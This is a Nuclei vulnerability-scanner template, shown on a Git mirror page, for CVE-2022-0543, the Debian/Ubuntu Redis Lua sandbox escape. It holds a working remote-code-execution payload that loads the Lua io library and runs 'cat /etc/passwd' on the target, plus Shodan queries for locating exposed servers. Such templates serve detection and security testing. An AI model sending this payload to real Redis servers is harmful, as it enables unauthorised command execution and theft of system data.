daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/network/cves/2022/CVE-2022-0543.yaml

49 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2022-0543
info:
name: Redis Sandbox Escape - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
remediation: Update to the most recent versions currently available.
reference:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
- https://bugs.debian.org/1005787
- https://www.debian.org/security/2022/dsa-5081
- https://lists.debian.org/debian-security-announce/2022/msg00048.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2022-0543
epss-score: 0.97184
cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: redis
product: redis
shodan-query:
- redis_version
- redis
tags: cve,cve2022,network,redis,unauth,rce,kev,tcp
tcp:
- host:
- "{{Hostname}}"
- "tls://{{Hostname}}"
port: 6380
inputs:
- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
read-size: 64
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 490a00463044022011a0e63ea5c6cc1be0d103b340fb94da0f291e22de5c2e639a40077750563ce902203e29f7cc62b489efc3598fec2d549b58bfd9bff17388c81b09e2637125c3deff:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink